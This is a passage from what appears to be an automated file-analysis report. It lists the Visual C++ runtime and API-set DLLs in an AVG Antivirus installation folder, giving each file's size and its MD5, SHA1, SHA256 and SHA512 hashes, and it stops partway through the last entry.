                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-datetime-l1-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      bb66dd4c715754bfa99abbcbee3a4449

                                                                                      SHA1

                                                                                      21a9bef9112c1a614bf3d5f6eb2d2f0f17b58531

                                                                                      SHA256

                                                                                      55804126146c7c575add104eec386f161672cb740e765eaaf7ec8707a7cd2af6

                                                                                      SHA512

                                                                                      aa3b8ec6c34ce2d162783595ff3902cc1e8812ead15f2e723feb82fb0202f654d7e1138e4b3f83c7cc0204e15c41a34ad0b1d07fd3bfa609e97c01241271d136

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-debug-l1-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      1c76698d36fce20d2919e67e3f08bfbd

                                                                                      SHA1

                                                                                      eb85df5d35cad00ee7eda50e8a4eceb2490f9245

                                                                                      SHA256

                                                                                      d95f01fc571294b128d0cfde5e68472b8f6a0b3dd5f0c18b676e3a077df80cc7

                                                                                      SHA512

                                                                                      7b0a9de7a2fab1b969b469f7e7edde93b9ede530080f4090ca0066642ce6bba28023bdb8ac5bd85eae38d918549be7066981a08263a3fe2a657a5cec15c62487

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      b2eac5c213cc442820167617d568e179

                                                                                      SHA1

                                                                                      9e61baac12e1a536be5e553530db8957ac606d37

                                                                                      SHA256

                                                                                      8b4a9ba2855247adddb4ee1e7f503dad5674ea7bb45015bd69cc83a3332f696b

                                                                                      SHA512

                                                                                      af7a8e6e16b86d4e2aa3141fd41a8c897957486b4d87d8ed14210590e86577e030b4b7c419ed988d22851c5fdf75236c23560fd855ada97a76459c9c93802c83

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-fibers-l1-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      38646cd15ac25a8d71bab09d5b077338

                                                                                      SHA1

                                                                                      4c153622a3f069480a194bf98add276f9138e168

                                                                                      SHA256

                                                                                      cb9f01af9ba4b50c604633073e4003652f1e99faff93daacd4502d4c08177688

                                                                                      SHA512

                                                                                      43844f5e82c7bf6a485a5411ce19aad3bb0f418852b86bb479f41170d85e04d02eaa76092b84ac7a1abf14b285d66fa2ff891cc9c97bbc18633af14ec44cebb5

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-file-l1-1-0.dll

                                                                                      Filesize

                                                                                      15KB

                                                                                      MD5

                                                                                      4d0399f0050b13586b8b04f62e95b16b

                                                                                      SHA1

                                                                                      407ca079a3bbe2837203beabf41516fdba776a16

                                                                                      SHA256

                                                                                      420395ac9ab87accb00fa478be0b73b583a42d406d1341d98a77f6189b556998

                                                                                      SHA512

                                                                                      8908cbf7cb7b87fc78a2baa1eb2aef52303e733987891361db07098fb70d776fe936d48221a846787d67adcfbaf30ad93b867d5578b7dd566fe8addc480cda18

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-file-l1-2-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      918b087149a2571d9db1eb04878c3603

                                                                                      SHA1

                                                                                      aa1d2c7550df6eddd2e99b44ac9de925888281ad

                                                                                      SHA256

                                                                                      b2546e21336714858d2b03d2532b6955dcd7ff46b30435f6d309d8c39d0dc957

                                                                                      SHA512

                                                                                      07c0d13e505c69985d6354c450887260345dc59468eb82b9b0534d1bd13f5f960d2d56932b204b300ac7e5f0ff7234c5e459de06d0e466fbc3f710fb9551793d

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-file-l2-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      320629a907048b64a99ef484417df721

                                                                                      SHA1

                                                                                      0de1886eae33bb5f16de27d647048a92586259d4

                                                                                      SHA256

                                                                                      b5823ce2d6e600eaf4e2b1353600dca0351c46d014f97ac525c3ee9dafb2bf4c

                                                                                      SHA512

                                                                                      6567cd36297cb05ed301e5f7eec87a5f796aeb9fb63ba30cbe73087bbe9539e2dc47a11947c8461cd79ead01052999913143d32ecf4cbdf5833a970e61d5bfc4

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-handle-l1-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      0e37f414237e14f395f8914ac2532581

                                                                                      SHA1

                                                                                      2b06c81103d7c94075dd63a8df33b72ffda75d2b

                                                                                      SHA256

                                                                                      3ab7f3707a380352c5aff32c0761c5ff86f358f3683b1dd273da8be18f6521a1

                                                                                      SHA512

                                                                                      3e226dd4a8c2aba7fc81132840e8087bc2fbc11096098345051d6eb1dc724f3960789f7f958d362c6cbf7d58904bf5ec7ac84945730256a50583c41dd2135bda

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-heap-l1-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      e36e88531f284b1135617b91f73e5ec7

                                                                                      SHA1

                                                                                      dac7d7984c7f906f66a2eadec395207a4fd9a599

                                                                                      SHA256

                                                                                      0c25f2284aec3aa7dcf6432ba9416e2fb289e08bbd996bcddadaabe42e361b46

                                                                                      SHA512

                                                                                      7e2f7095bba85a3d6aa21cd7371b73d9aea6b07d89a82c448a65f3188d9365a0070cf8b5312a3ef0eac1e4a2d79eb3d34dfbd7a16a7d9da19545ea216c195c4d

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      f6f0270f98f5cf857d1e0667819fc9d6

                                                                                      SHA1

                                                                                      959209e5e068aa2564f4f777e1c8616a9d4cb6a0

                                                                                      SHA256

                                                                                      616ac120e3b9abb6f245a09fc17398bef10c5e6aa617849fe68a89efdcddb7fe

                                                                                      SHA512

                                                                                      1ef69bcf037e2ead4b4c3518a8e8e3c2dd3065049649a6973aaed9300ff6fef4bc2bc25f7d0b92dc4ab5f6a576850537ce9d6e00090af86512d080417eda42c1

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                      Filesize

                                                                                      13KB

                                                                                      MD5

                                                                                      ae1eb2e7a5de49e2950cd2f7892d5513

                                                                                      SHA1

                                                                                      ab7ea36f3c4232f0b3f6036edecffdd4e8603936

                                                                                      SHA256

                                                                                      23fbe7263ca595af627fc37e774fc6fd5f66daecb54e38d48486c9df09e438f4

                                                                                      SHA512

                                                                                      ef919e89dbfe93ea2f45e01913c9b7d1695520f3d0073f2b578ef814e3dd6443bb506e5766d09d41e802f9c2cb4d35778c87f86faa89baf7dce66da787b85418

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-localization-l1-2-0.dll

                                                                                      Filesize

                                                                                      15KB

                                                                                      MD5

                                                                                      c542c43d910dd6ae2f4a7cffebccf613

                                                                                      SHA1

                                                                                      02086fd8e53fcb3ac20cd4aabd730d46458d698f

                                                                                      SHA256

                                                                                      230da452a8068ff5be158d84618c9d291bf9b8bc878ed5d56318558d52e4966a

                                                                                      SHA512

                                                                                      364aa5a59c10d95c6a93024a443972a06dfaa1693c942bca517700bcddb9372aae1c76bdf35453a5ea256179fa61586922cae7d22f4623135fe7168b5bf04153

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-memory-l1-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      2b3eae5e560be8c87a246d0e8fe3f593

                                                                                      SHA1

                                                                                      8f9563bb72fbea30d37a27c353daceb552279603

                                                                                      SHA256

                                                                                      b858256aa6a926f89714f21790d25e90b7dea5096bd9935454a8b4c7abea736c

                                                                                      SHA512

                                                                                      e33e50380d37f075b8d7fa283d5b4005ccbd7c35af1d11dc6ea4f4529c39571f50114d2c678061daa47f6b36bda9c948ca724acb9aaf9595ed7caaef2b0c0359

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      4ee09ce90a33fc4f885539370d3ab11f

                                                                                      SHA1

                                                                                      023fb903cb6ddd95e25f18fd72e1b57b4a5ccff2

                                                                                      SHA256

                                                                                      4b00d5be82d9eae3445b559f4eb1c62eb192f5554b9edad50b09f98fbc65c126

                                                                                      SHA512

                                                                                      afdd5f50fecb5ada09a4d8217f1db396a2501b4ea14db90267ce51e964536a9e7c32cc55b5a8239c357f9146a7f4fa601181b7b8222670550667fae95d55bcf4

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                      Filesize

                                                                                      13KB

                                                                                      MD5

                                                                                      9c46e030383d0f85a113a1f3b7477a77

                                                                                      SHA1

                                                                                      7f762360a7cb9881fa9c153f42f3a39be89db946

                                                                                      SHA256

                                                                                      d08d50eff27e71af2e72655edf22dbdea85346cc14be53c48988a3c039fdf17f

                                                                                      SHA512

                                                                                      6ab0490d9eb82f010dc4bdea8e54b9b760a417a44bb88a7bc74ce7d61833e355cef54712f3340b37fbdf07dbcd83e17295ab546d864ac06e84e0bbb7d8dd8649

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                      Filesize

                                                                                      14KB

                                                                                      MD5

                                                                                      fc776a56634728a146211939d14187b5

                                                                                      SHA1

                                                                                      f8372701ba9ee1a51ecf4649c74e27d1e996a45a

                                                                                      SHA256

                                                                                      ca2b5493a6699756b3bf63d9bd807b0204419ec3087d02f4bb5c7b01e8fffd4e

                                                                                      SHA512

                                                                                      dd468a46c62e8a5a2ee64332522d5ca5f8093b13722e13cfd996b32b6efc74cc2a8502b44cada19ec0c30027dab400c8567c84937f08ccd989d8a0b75b470a75

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      51b851eb7b58ca2c3280def9722a9602

                                                                                      SHA1

                                                                                      75aa3331eb7da58868f700158df56fb49e3c4507

                                                                                      SHA256

                                                                                      9f0d6efb48c7f8c0f001ec30d45558c5d8675c06573eca7c8125a7d5a1db2634

                                                                                      SHA512

                                                                                      e9b0c683b58ecdba5d5132f6808ea2dd85a3db3b0d9690efb54aeee92c29b8b2b4535437d861d2fa2a8033e623aeb4ee0661dd01e17527a74d6002c9926e8783

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-profile-l1-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      5e50911343631e123b2de2d19ad5e2ef

                                                                                      SHA1

                                                                                      48f0330e58e1a17a72bfc9b1283c8eadc96e1ccf

                                                                                      SHA256

                                                                                      b3caf7155167f5d1d4ada4df4764bc78b85032bb769e5ef586fcab27fd681cb5

                                                                                      SHA512

                                                                                      eb6e19b6b51a4422a861615d1f1d0742473e49eb4ff4a2a25c84bc485b9db336f14e3ee83afe8d221d91466ec7ae436b1210288ee3328a2ee0f66addae3be953

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      f04d8cd1c228b2a9321429bc9d72599e

                                                                                      SHA1

                                                                                      6695fc5cbee5c73077c59ef514353a4e2d6485f8

                                                                                      SHA256

                                                                                      498d2f02f5fe0a73cdaa1617be6bf7b2b550ada0537f8b1673c590ea99429c30

                                                                                      SHA512

                                                                                      afa2baa1a7344e795e325cf3b757371978d5e1c2288c31354095f4c30a4d308f2d405fd00b4efa86fef5830930a247dced395f11cab49e6a620df2241abbd069

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-string-l1-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      796e70f25faf0353eba92c001569c976

                                                                                      SHA1

                                                                                      2b427d0ad6e6ada06c012860a532da24e3f1a8c0

                                                                                      SHA256

                                                                                      9e153dbf1c157a910dfc62d1f1ae6c728ae3d5f2b767c5659a6881cecd35d8f7

                                                                                      SHA512

                                                                                      e0a2b6716add6542de78d409a4986a57a7d2e7d10672a57bc5a44fce3e65e365727cc64e9fb34deceeeec96b544d22b0901605985f5cce7f11341a00f898b56b

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-synch-l1-1-0.dll

                                                                                      Filesize

                                                                                      14KB

                                                                                      MD5

                                                                                      c748312b0f6dfa5440bfecbd094f9180

                                                                                      SHA1

                                                                                      d991110deb52177634630ab6165e195ea62ab1bd

                                                                                      SHA256

                                                                                      7966a70a6113a131c563914f8cc7acfd8b8922d8ef1ddb2a18caede076f1eca5

                                                                                      SHA512

                                                                                      c5554ea1436d27ff336d7e25f6f68d485c65d916389213cb9c33df2622cf08314411ce941482c03a251e214e2faa72abd266e2ccd444c95c65f12f78eda5a830

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-synch-l1-2-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      364d65fe7f976fd00702f5bd63eea9b3

                                                                                      SHA1

                                                                                      e40359ed2e2deb198caefedc27acf8c7715fc80e

                                                                                      SHA256

                                                                                      85fd25863a60e7c627494dcf14b169480023c0b8e4682a0e495f4f7389407149

                                                                                      SHA512

                                                                                      dfbc7b8660a7b96135ce0b35c8f2f576e536e8f8bfb53ee268611fabb4ddc4c53fe06a1a9e81ff26a8e10dafc40eee5d579a2bd1e19d7517bf6f089c605ece6c

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                                      Filesize

                                                                                      13KB

                                                                                      MD5

                                                                                      7ebb75a1000e52570ca55c35dfc7bd6c

                                                                                      SHA1

                                                                                      764dc860173990e451f6aeb6fd9b0164a86e447e

                                                                                      SHA256

                                                                                      2b151cce07a4d9c8507a1c547fdcb6ad904f9ebeeee71439d6151eeee287984f

                                                                                      SHA512

                                                                                      6d9c127cb35c122cb028eb9e8e7cdb466dc7b429ae8a13ec818df96917120f5e1f47902ecb3ecce9ddb1379029c63db3b6504d83dac8b6342484124902672c09

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-timezone-l1-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      2a21692ef3a54e5f4a016a3a1767a7d9

                                                                                      SHA1

                                                                                      9890261f7cc42d660371c1b9d3a96c09b1e48783

                                                                                      SHA256

                                                                                      01f6b2760031ed0d521e8d972a6e7b4aa05393934a37266c3f9374042cc97b3b

                                                                                      SHA512

                                                                                      7ee03077c29867a717245bbcc1f4c7afc425c5e248c7c70f884e3ad0bc0267f95b94ea2f47e3554b2d189160d56ba4a6924399bc80201fde24cbc943894e60af

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-util-l1-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      b179b9f02a2a42a92c8eee8722d03745

                                                                                      SHA1

                                                                                      86021ffb09e59a781e96158c8f5fd7b63ef950e2

                                                                                      SHA256

                                                                                      9c57a5fbaa0a57530b988a4aada32e378b1cbd1fe368b90e147f12069c8ae7bc

                                                                                      SHA512

                                                                                      4fa0ba86b83d4d3ee041772cc59c17407d02eef04385ad9c6d63547fd9e039a90d5a161b9acee7af9defce761ff47e288207f60b2b81a28cebe73ee1d68f0482

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-crt-conio-l1-1-0.dll

                                                                                      Filesize

                                                                                      13KB

                                                                                      MD5

                                                                                      410fb7adfc54094b95609747a5376472

                                                                                      SHA1

                                                                                      e2e79f589a2e71009d9947bb02f05b877e208266

                                                                                      SHA256

                                                                                      77f2e7e09fe542ea78f4f6f23440014461074b993e50bf75d02b2c6571f5d696

                                                                                      SHA512

                                                                                      57fc04e4c770766ee9c2cdf7ec166792fb4164d7657fbbb6a6ec74a5073de953860b7c1d5754b28b61a83b7bb1cc0a1417a2f13c246aa06044045687b207bddc

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-crt-convert-l1-1-0.dll

                                                                                      Filesize

                                                                                      16KB

                                                                                      MD5

                                                                                      03c2c3d48cba89a77a8c06158056aaa8

                                                                                      SHA1

                                                                                      3cf294991250721c2100288d4dbcb0343cc04bf2

                                                                                      SHA256

                                                                                      43e0c37da7bc6b2786f95765f14177651bea534ca4d1d966c79fc301a55ad5df

                                                                                      SHA512

                                                                                      bd9787ec2cf87f8c790db18724a5cc10d1a6de005fa8cc6a74733521bb11251bd0d026af9468e98b616a6d8212cb41c3da102248e105a4b312d7b068e9c407d0

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-crt-environment-l1-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      490c63e6b1aba9a525404067ce3c20b6

                                                                                      SHA1

                                                                                      04997f8a146284f8369c7db6204949658d6d7180

                                                                                      SHA256

                                                                                      c5131d1abd188d009e72b8c6474c74a262b7b8ec504470385f7f69428e7ae0e7

                                                                                      SHA512

                                                                                      245c4e2545e7eb5462e20e12d8092cdaba24d48e6c53d02f3eec586de17eb9cb6c15cea204a18deeea3cc8668c8afbe9f35b0fc1e751d2f515edd18ae149d275

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                                      Filesize

                                                                                      14KB

                                                                                      MD5

                                                                                      d1f28f796bacea3d58eca271fd128758

                                                                                      SHA1

                                                                                      934efde030a54a441c342af18ab5275e5facd0e8

                                                                                      SHA256

                                                                                      b8d3d45141ad57d917b25d2491a07f20c77b1dfd047e203e26dad591c40b225a

                                                                                      SHA512

                                                                                      4b6ada7f10a4a660c3b6ac0fd81a41c680bd6752eb1a70da08510feb10fbf2b7d5ee177a94d5093239914eea79114097329a64067a72068a8baea8a9963e3901

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-crt-heap-l1-1-0.dll

                                                                                      Filesize

                                                                                      13KB

                                                                                      MD5

                                                                                      0651bcd9acadac1d50653be35378a82c

                                                                                      SHA1

                                                                                      5d1b2233c7acb3915d33f7b29cc2f0cbf34ea1ad

                                                                                      SHA256

                                                                                      fcf66176b6f7ab86f98f38d5662f61fa61ad3f1e59740d8a1df0e1072248cf6d

                                                                                      SHA512

                                                                                      1ce05989181faa8d291bb0df34bb4e93f2f576187cf2d0c5110988ce17e6a682d815297fcc9fd174bc1791713fb07b616ed952729923abf8c06b8b8f6d71d82e

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-crt-locale-l1-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      592a65b922d4cd052bae1957be801a4f

                                                                                      SHA1

                                                                                      8371486ce1b38e692c0abc4a2a9e0c3e1945bb89

                                                                                      SHA256

                                                                                      d78e74087d151454365adf6239967c8ecebe85b1c6c6d3f59e70f0980028b1e7

                                                                                      SHA512

                                                                                      0837209e518d5db76ceb8128dd49cf03b8f0d11526630ad20c716ade1e02df1b39a8440d20ee20b488c6d6180c155d00a9cbbd311fc50f4803a8b95d4a545726

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-crt-math-l1-1-0.dll

                                                                                      Filesize

                                                                                      22KB

                                                                                      MD5

                                                                                      46aaecdb8d337980c82cb2714a985986

                                                                                      SHA1

                                                                                      22104d2272b592a344df5b575fcff83ca0e4b161

                                                                                      SHA256

                                                                                      34457a002e90a590b516bbf58530cdddbb618a46bb3e764e18167c44934917dc

                                                                                      SHA512

                                                                                      33c91058a693b82f1457d49bba2e209a90b825927be89e38523671ac16f4fef208b98efa980a3e11185baa4df6d7639d447bf30e19dc91b76f04ee61b6169bee

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-crt-multibyte-l1-1-0.dll

                                                                                      Filesize

                                                                                      20KB

                                                                                      MD5

                                                                                      7442e7059f712705d4b97699bf56de35

                                                                                      SHA1

                                                                                      f924088428eda3b76030091cf59ad38afb590118

                                                                                      SHA256

                                                                                      f822289ea5a9b0ccf9777a72bc8b73ce68b596fcca811e0cff0adc4031056b20

                                                                                      SHA512

                                                                                      dec6228063bbab561ae0c02cbcbab3d08c15f261758405d8a709707a180a09af9c462b0b382b700177f285a1ce3bf7e71e093f9031d15f932120fbfd396aa851

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-crt-private-l1-1-0.dll

                                                                                      Filesize

                                                                                      65KB

                                                                                      MD5

                                                                                      3b07abbe272e9b9e2989e2d6a400fa53

                                                                                      SHA1

                                                                                      f925e5e58377dcdc13b6d80ff22c775e2334e372

                                                                                      SHA256

                                                                                      a170d9851a1427066d1fd61c32a9ae4b9545aa926be55da7e7d94275be281dc8

                                                                                      SHA512

                                                                                      14762c984aa6736b1330b1f0b296622fc1ce3ac79108c0bfee793a51131deacd09b494e8c851c6e437a84871a864dd65389657df8b2256f931e3c60a61fade8b

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-crt-process-l1-1-0.dll

                                                                                      Filesize

                                                                                      13KB

                                                                                      MD5

                                                                                      0444624f30e8030d84bb169fc2410444

                                                                                      SHA1

                                                                                      05c1cd844368ae2c113585b477f91507430d72a0

                                                                                      SHA256

                                                                                      0b87358da7882fed313facee92bb8f4e45299c63ca557fdfba1478b364575fc5

                                                                                      SHA512

                                                                                      648a79fd30a73582907c7ca008be5ef78e6e72aa22478448721c4c5bad45a45bf76570d24e061dfae5e535666e79154f5f9f66a08746313620a17582e3998304

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-crt-runtime-l1-1-0.dll

                                                                                      Filesize

                                                                                      17KB

                                                                                      MD5

                                                                                      90340ac74d22b9a67237ea52a4dc1c75

                                                                                      SHA1

                                                                                      75d44b240afd4198b0f3b7256a4a9533ad1ba73f

                                                                                      SHA256

                                                                                      fd48da616f2d17054bcab961239431d99c247586f96bac69aac5b704ea694352

                                                                                      SHA512

                                                                                      6f52ae85b4d9ab8516d72bb1662ac9cf602092fc61ea78bd85af05047c70a0adc5edb67266032f12a86601c983015276f15a457935f5b6143dc80d335351e5ec

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-crt-stdio-l1-1-0.dll

                                                                                      Filesize

                                                                                      18KB

                                                                                      MD5

                                                                                      85444893a6553a4dd26150a68fd373d8

                                                                                      SHA1

                                                                                      ad9b46da45366f13a22173b06e22a45a211e99ec

                                                                                      SHA256

                                                                                      65f2a93490c845833541de1376d5bb65e6e864a1a9232f58f86a7a84408508c9

                                                                                      SHA512

                                                                                      ad56f71d0dc6d2dc5dd46eaa00247bd209403014648fb9c8f98937fc8e36fc85c0107365d2f6ba4f6d530f340278e0205d94bafebc78d10201e71dbb5d4c36d6

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-crt-string-l1-1-0.dll

                                                                                      Filesize

                                                                                      18KB

                                                                                      MD5

                                                                                      841e4ff9bb531b52218392db1d7cfbe4

                                                                                      SHA1

                                                                                      5607c2a987436195f1e241a0b29e8fb1f734102f

                                                                                      SHA256

                                                                                      4da31e582dc47d46132cc73ad34d5b87dddd2338495ceb2772f7e103a9a32ebc

                                                                                      SHA512

                                                                                      93232073d95870043994c752318f9b319db508fff452e4aa0b8e42e66d13623803be4537e1798dd05177b7427175d989c8e49a379fd932297e161d461bae268b

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-crt-time-l1-1-0.dll

                                                                                      Filesize

                                                                                      14KB

                                                                                      MD5

                                                                                      0713775484e95e5bebcbe807d53488f8

                                                                                      SHA1

                                                                                      222dcab5f38d72971fad641201ba3ff9a2a0ecdc

                                                                                      SHA256

                                                                                      e63a096b1ae68a774b1f1afc51b5dbef1a5ac2d79dccc1104112c22841e3e378

                                                                                      SHA512

                                                                                      f19d30d37718de3edba15358888b13afd9f9dfe4bdf37bdeb3204fb6cdeec3f249e388d06a89b21dd4a0da9d1cd70bc4f5244f287a4d907dc0a786df7ee97097

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-crt-utility-l1-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      b52238936bdf50ab985435a176281f68

                                                                                      SHA1

                                                                                      7bd2be0808c538b6f15f20a9a1228cf4a20adbdd

                                                                                      SHA256

                                                                                      3a23171aac49453f931d69cd55f6ec742243f5835386d9e6b18efad96c2be450

                                                                                      SHA512

                                                                                      36999e6cd50e26b1620fe24ba2dc11a40b25d1d77cc7a0337c7a3f65b16383fdb224e179392a215e6dae846e8bda6acb3e027445fd334e26e34278a397452f6e

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\avg.local_vc142.crt.manifest

                                                                                      Filesize

                                                                                      27KB

                                                                                      MD5

                                                                                      4dfa6db968c4c50fc1f1e41036572358

                                                                                      SHA1

                                                                                      1f281bdc5210640735775ae1b9e4a70ecee8329c

                                                                                      SHA256

                                                                                      14ad3b0d76e581de26d6516965fc2ff28162cc2027c2b7e18fcd18aef77d8854

                                                                                      SHA512

                                                                                      1c95f5f3da8184e66927ab238f2a533222442be10ff712c095b50b007ba0f8af584f28cc509ccecfd480c03fac47082dfdc4dc27131c2de4ee61afe4aa8ff642

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\concrt140.dll

                                                                                      Filesize

                                                                                      251KB

                                                                                      MD5

                                                                                      2126db527717014c6695f9745a480c2e

                                                                                      SHA1

                                                                                      3d564a111a7f5a2a3e9b06ace066931fbecdaf68

                                                                                      SHA256

                                                                                      50c864c13306921277e9c43f0133c754938e96cfa6982879d106b32b4551d984

                                                                                      SHA512

                                                                                      a47423d6ce322d297b0ec222ab8fb7cc46a31f840f412f6da0bd4ee9c40080ce4dcd2b00267de53721e61ba8ea02ee99d366a1047e41805f7feab8c43e4babbf

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\msvcp140.dll

                                                                                      Filesize

                                                                                      436KB

                                                                                      MD5

                                                                                      0d3e750f8b8882470a74db90de94f814

                                                                                      SHA1

                                                                                      cb07462263379d3f5dd89e2b62ac31a2f7538821

                                                                                      SHA256

                                                                                      5b858fe4a054adb9461cfd12a5f3b8a9622a2eae88bca8dbd7d84a9f972a20b3

                                                                                      SHA512

                                                                                      b5ac0039428d844db36327ce6637d207ab02ad4cd89e0eac361d61393d396d6e2fff76d1007985889ec88d20e9c62ad29363b984b77d791feba588c1ec64f084

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\msvcp140_1.dll

                                                                                      Filesize

                                                                                      32KB

                                                                                      MD5

                                                                                      8ecd8aea1af9dcb3bff28b1d4e0795d4

                                                                                      SHA1

                                                                                      acd125327614726c4069fcc4cde256d276f57ef4

                                                                                      SHA256

                                                                                      ec4743a6044224132ffc5f20c25bd7e36dea25f7ea9baecec7db40b0904dd7de

                                                                                      SHA512

                                                                                      33ba68e27fc769f0166e72da458244981622ffbfad33ae1015ec73ff83751eae9aebf1aff991247ddc31f0223888f8f03fa9b2b1d6069112ad8e1689e519057c

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\msvcp140_2.dll

                                                                                      Filesize

                                                                                      244KB

                                                                                      MD5

                                                                                      1b73cbc1a51c5c2e61072729535e3148

                                                                                      SHA1

                                                                                      52f3494af0555caeaae477173dbd7a8c171997ee

                                                                                      SHA256

                                                                                      4279fe19e9d88988a93f5d334518b204a8956543f84467168d5c63d490337593

                                                                                      SHA512

                                                                                      9898d2952dc3cadfafdacd6d281d8e1614f6a8ca88448e52d393fc540e543f810d434e8eb74a640232f83c4ee2a07e8b37184f59adcfc9c8551cd0e061cb4460

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\msvcp140_atomic_wait.dll

                                                                                      Filesize

                                                                                      45KB

                                                                                      MD5

                                                                                      cc556ffc1ee06111ba305967b089779b

                                                                                      SHA1

                                                                                      9b515a2f8e7dcf570f040b19a64b36166e17d93f

                                                                                      SHA256

                                                                                      be242784fa947e505ab9d79a23d7ae96e5979af03bc51297ae840517942f8675

                                                                                      SHA512

                                                                                      51fdf6c92ac6cc06b04092a0b1f9d391ed36d8ce0b2b123fff9d228875bd91b55dc218615f757f06f34c11d2527344f21c7db48a7b0502685bf6f77650d240a2

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\msvcp140_codecvt_ids.dll

                                                                                      Filesize

                                                                                      29KB

